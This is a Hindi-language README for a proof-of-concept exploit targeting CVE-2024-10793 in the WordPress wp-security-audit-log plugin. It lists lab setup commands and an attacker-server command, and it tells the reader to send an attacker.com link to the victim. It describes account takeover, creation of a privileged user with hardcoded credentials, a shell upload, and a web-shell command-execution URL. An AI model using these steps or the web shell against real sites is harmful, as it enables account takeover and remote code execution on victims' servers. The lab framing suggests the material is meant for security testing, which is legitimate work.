
CVE-2024-10793 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो WordPress wp-security-audit-log प्लगइन को लक्षित करता है। क्राफ्टेड HTTP अनुरोधों के माध्यम से खाता अधिग्रहण, विशेषाधिकार प्राप्त उपयोगकर्ता निर्माण, शेल अपलोड और एडमिन हेरफेर प्रदर्शित करता है।
इन पंक्तियों को अपनी hosts फ़ाइल में सेट करें:
127.0.0.1 goodcms.lab
127.0.0.1 attacker.com
डॉकर का उपयोग करके वर्डप्रेस लॉन्च करें:
$ sudo systemctl start docker
$ sudo docker-compose up -d
http://goodcms.lab:2121 खोलें और वर्डप्रेस स्थापना चरण करें। वर्डप्रेस में wp-security-audit-log.5.2.1 या उससे पुराने संस्करण स्थापित करें।
हमलावर सर्वर लॉन्च करें:
$ php -S 0:9091 -t ./exploit
http://attacker.com को पीड़ित को भेजें और बिंगो!
शोषण प्रभाव:

खाता अधिग्रहण और विशेषाधिकार प्राप्त उपयोगकर्ता बनाना Poc: शोषण के बाद हमलावर क्रेडेंशियल: { email: [email protected], username: amin, password: 123456 } (आप xpl.js कोड से बदल सकते हैं।)
शैल कमांड चलाएँ: http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id
